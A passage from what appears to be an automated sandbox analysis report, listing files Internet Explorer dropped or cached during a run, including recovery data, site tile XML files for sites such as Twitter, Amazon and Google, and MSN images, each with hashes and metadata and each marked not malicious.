                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{04CD2A19-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.845521788599599
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{04CD2A1B-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27376
                                                    Entropy (8bit):1.849348397296045
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F2-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27388
                                                    Entropy (8bit):1.8485923221388139
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F3-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27864
                                                    Entropy (8bit):1.825177741662783
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F5-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27924
                                                    Entropy (8bit):1.8481559818243574
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C1-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):24616
                                                    Entropy (8bit):1.7250471470155058
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C3-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27372
                                                    Entropy (8bit):1.8473737929923448
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C4-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):16984
                                                    Entropy (8bit):1.5622410161039688
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C6-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27924
                                                    Entropy (8bit):1.8485409271540891
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C8-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:modified
                                                    Size (bytes):27864
                                                    Entropy (8bit):1.8262696484742256
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D924C22A-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):369024
                                                    Entropy (8bit):3.622827487633413
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DFA153C9-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):19032
                                                    Entropy (8bit):1.5836871089637126
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EEB78589-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27428
                                                    Entropy (8bit):1.8643943465143213
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EEB7858B-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.8434823592774872
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D2-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.8465443252638856
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D4-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27368
                                                    Entropy (8bit):1.8451297139834941
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D6-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27356
                                                    Entropy (8bit):1.839945772068177
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D8-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27384
                                                    Entropy (8bit):1.852232997888497
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.042726549573001
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxOEkkRvkRPCnWimI002EtM3MHdNMNxOEkkRvkRPCnWimI00ObVbkEtMb:2d6NxO4OYSZHKd6NxO4OYSZ76b
                                                    MD5:6A6DE00C5C6CC4CCCE0649B6F800F389
                                                    SHA1:D9F0971C5A86758DDCEAC3B7EAC0D94E18166200
                                                    SHA-256:2C4AFF4558994CE31349A799C7CF9AAD956FB7784DFE2250D4ADA154EB4093AD
                                                    SHA-512:1B9D0609D682B2C270E606B831A8B086A2EBE06BD72C1AF91C6B8C19758BBBE87A39861505CE778C9A4C86C6DFC817B4864D7DE27227D65E1768651B894919F5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.096327248141829
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxe2kj+/G+/PCnWimI002EtM3MHdNMNxe2kj+/G+/PCnWimI00Obkak6Es:2d6Nxrq+u+SSZHKd6Nxrq+u+SSZ7Aa7b
                                                    MD5:DB742D46725F9BBD894A7EED16688F7A
                                                    SHA1:A508B951E089A320F7791EFB42B3F6EF7831CF4B
                                                    SHA-256:D4589635E57BB01E5A8B2CE39238C1464F798983C3AE4D8551FAE8BD68D774A6
                                                    SHA-512:EC22067D4EBBFDCB52A3DFCB78E78F41CF1A7B2AAC43A5CF3952CC436655DBC2D5D60FB20BDBD72A58408D0C0BCBF9C173D4C262F47CD705EC80B203A2929007
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb08a5e43,0x01d78310</date><accdate>0xb08a5e43,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb08a5e43,0x01d78310</date><accdate>0xb08a5e43,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):662
                                                    Entropy (8bit):5.062339606985476
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxvLkkRvkRPCnWimI002EtM3MHdNMNxvLkkRvkRPCnWimI00ObmZEtMb:2d6NxvDOYSZHKd6NxvDOYSZ7mb
                                                    MD5:EA9DF6F276DE9734280E596912001F64
                                                    SHA1:4A16B3E19D7B26F497C6F6BA6C74E0FF1FD05270
                                                    SHA-256:C670769B64EA3951C903E91B1C5D4659CDB987116EB43BCC11F86E2991E3A42E
                                                    SHA-512:1D267019E3EDD0BE13CD93D4A4C2C2BE54C2A3DC2A6D191979622E8EDBAED5B5A735DA8EF0C7D5E4377191ECFF2A0AAE2D2B897282BF6BCCADDDC2440026C0E0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):647
                                                    Entropy (8bit):5.039111808233237
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxicvvxvvPCnWimI002EtM3MHdNMNxicvvxvvPCnWimI00Obd5EtMb:2d6NxTlCSZHKd6NxTlCSZ7Jjb
                                                    MD5:2C13C2FF7BE5B1AEB9901CAE7B2DAA54
                                                    SHA1:63CFE85A2872EB457F9CDC773B6276CDF2C3C34A
                                                    SHA-256:8BB969C7378126E16D0C01D28B1714AF8AE526CA1430348508B61A9E2E7C62A4
                                                    SHA-512:20B110C8255CD9CC4FC08141268841E712940F80EEC2629F22F2E889A3A3CE92B4606AD56D96D41BFAEDE4DE752A0A772B0B0FA0681C260517E73C8EF44BB24F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.071494638877265
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxhGwkkRvkRPCnWimI002EtM3MHdNMNxhGwkkRvkRPCnWimI00Ob8K075t:2d6NxQsOYSZHKd6NxQsOYSZ7YKajb
                                                    MD5:7D85A53B0FBF4C2DC77F434EB842EC93
                                                    SHA1:2166F880FD6A8C977F9315F0A801825B1E6958FF
                                                    SHA-256:735219FB708300EC9270E00B2AC4AD9FFB5E2B47579BEFBD1EAF86A30302520E
                                                    SHA-512:9C85CE5B7F7D2FADF3FE7D03DF8CE09E1F3DF9E6C10D2668FDA58D3579C2AAF47BFE5E79C88401D9337EB1E2CC70CEBF403D15F994845BB33DD95BC73101E9EB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.106331455783946
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNx0nFyPCnWimI002EtM3MHdNMNx0nFyPCnWimI00ObxEtMb:2d6Nx05SZHKd6Nx05SZ7nb
                                                    MD5:750D91217A235D33D2F6005D483617FE
                                                    SHA1:7F10D5F30C58C1957C47BEAE2B6F184FB2B83594
                                                    SHA-256:DED954807397375F9F005888C928C02C0F56F98924725F018AFF453F99F656F2
                                                    SHA-512:182A59C2085851E58408532B045EA4055D41F50D8934046CF8451CF6EDE3F789740F7E18EBFAFE54026C2151EA1168E76BD0340450127587154522C160858190
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb0b29d75,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb0b29d75,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.094350278507908
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxxcvvxvvPCnWimI002EtM3MHdNMNxxcvvyPCnWimI00Ob6Kq5EtMb:2d6Nx2lCSZHKd6Nx2PSZ7ob
                                                    MD5:A43601AE804818F43C8BB3F30A88D5F7
                                                    SHA1:C29EDCEFD26486ABC6E65A2B690BDF639B9B61C9
                                                    SHA-256:8EC6B5A16DE72DF74DD10DC4FBF124FFC316B8EC4F899E62ACD3C764C455A784
                                                    SHA-512:19EBBFF9FDAC87BB513FD45770B2E0724BF3AFCAF5FBEBAFA49B13C1E089B7CC25A8C4B27CB340128289D2312FB6DCC0973D850D858796B4532402BF8A3AF65B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):659
                                                    Entropy (8bit):5.124435257437636
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxcbsPCnWimI002EtM3MHdNMNxcbsPCnWimI00ObVEtMb:2d6NxESZHKd6NxESZ7Db
                                                    MD5:66656370322A80024210C436E78D0978
                                                    SHA1:AA0EA220E9DDA43DF45FA2293634BFB00155F65B
                                                    SHA-256:A75D3F0F02B48356A9D1EE46321803B5AE225D13EB8DC93CD2EAE74F90290FD8
                                                    SHA-512:68407E853456AD4178615491A53094F01EB7BDD5AC919D63D63460FCB1A7B2DD41F278DB5DCF9614CBE4CD8C15827A2F3D7946C51D5D3241CB0DEE7C8D0AFAB2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.096798448194966
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxfnbsPCnWimI002EtM3MHdNMNxfnbxvvPCnWimI00Obe5EtMb:2d6NxhSZHKd6Nx5CSZ7ijb
                                                    MD5:A60A03F6CDE5D736EF7E9B603C94D2FE
                                                    SHA1:30EF39AD6EDA04B295BBBAF2455366883210EC92
                                                    SHA-256:04DDFA704A9FBBE39DCB5E85A39FC9D8919B4A585AE6803524CDFA1E53D20915
                                                    SHA-512:27B37E8C8B365D02BFDE430713C1E367BCB0BDBB0773A7650D8455DD5F9D5EDEE42DCEF6975179381DBAC773321D5EF5D58EED04EDC4480AB3B7B56755233913
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):934
                                                    Entropy (8bit):7.019073291745009
                                                    Encrypted:false
                                                    SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGS:u6tWu/6symC+PTCq5TcBUX4bI
                                                    MD5:2E2CB8F3A2C7DC9A1CCDF8B599924B4E
                                                    SHA1:DDC0737C3C1767C28AC37B9617E3BF74DE1C1638
                                                    SHA-256:E973AF36500B83585E35062FE2DB2A3CBBFF061C5D983D2F36A8EC9F94740165
                                                    SHA-512:CE9076B84604AA7BBDDB85843C17486B440880F3C238A9A2F7386D80B5CB0EF93159716F5A649D7A79F7B4B1AE1963F4FA2C11D1A717508BCFBEF0FA2F9A7809
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ............H.a.....H.a....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAKp8YX[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):497
                                                    Entropy (8bit):7.3622228747283405
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                                    MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                                    SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                                    SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                                    SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AALbue7[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):941
                                                    Entropy (8bit):7.721354518483316
                                                    Encrypted:false
                                                    SSDEEP:24:oGdC7QFWvXNkhvarhCqD0/kT0jpF+NRTtMuqN:DcdkhvarhxuihtMuqN
                                                    MD5:8C0F6C7F476CD897F9FEE33D249179E4
                                                    SHA1:A5CF9958B7B7EAF290595B175752477B3CAE11AC
                                                    SHA-256:3716D783DB4CE9E90DE0FDA7B5E4A81679A2590C633378B64590066EE6D6EAEC
                                                    SHA-512:E485C5F62126953498422C32D512F9BDBE57909AF942B1F7EE4DB116637DF6375F15C93B130213618BB46A9E05A93C8E0A1033F0444DDBAD7E2864ECDF63A12D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALbue7.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMlPzk[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                    Category:downloaded
                                                    Size (bytes):36707
                                                    Entropy (8bit):7.915307666623186
                                                    Encrypted:false
                                                    SSDEEP:768:I/fZbQnJimaEgCIE7o6KQie8PjaNwV45+wtKSZ5l1RuR:IlQJCbEU6KPZMO45+wtK+iR
                                                    MD5:FA08D225870B128A8DE1EE22AEAE334D
                                                    SHA1:231869EEAC2BF327072B2DD8915A26EE9C450608
                                                    SHA-256:2428BF4015BFB5838C5B38ED4A7A36C1A26482E1E4081F4CF1221495C509D37F
                                                    SHA-512:3E73F1F14A29185A549096D5FDCB218A245928AD2A23A05761F004CC114E0FFAFD0DC851FE8FE2EC0F4882F7058E77F363B878742E45B577C52CFA0858505A4A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMlPzk.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMrA4D[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                    Category:downloaded
                                                    Size (bytes):2063
                                                    Entropy (8bit):7.729041467743935
                                                    Encrypted:false
                                                    SSDEEP:48:QfAuETAbZ1NE+fU3X8S2uA+9sg9y3I0oS:Qf7EYHVUn8ShANg9y3I0oS
                                                    MD5:4A65B6EE9D3731C5ADC164A20F304B62
                                                    SHA1:D9F4019A3B6616BD5A67287B959AC3C29173AC46
                                                    SHA-256:040035EE50818D22D62F584A538112EEBE454544650DC84656F346EE02B39898
                                                    SHA-512:442BAA0FF013B95676D27F6AD7D185C6EAEF88B23BD4CE7812638BA436D783A526E1EF526F78C71FCECEB629A7938C451321DC19FA07026BB2CE514B952634CC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMrA4D.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMteHi[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                    Category:downloaded
                                                    Size (bytes):58578
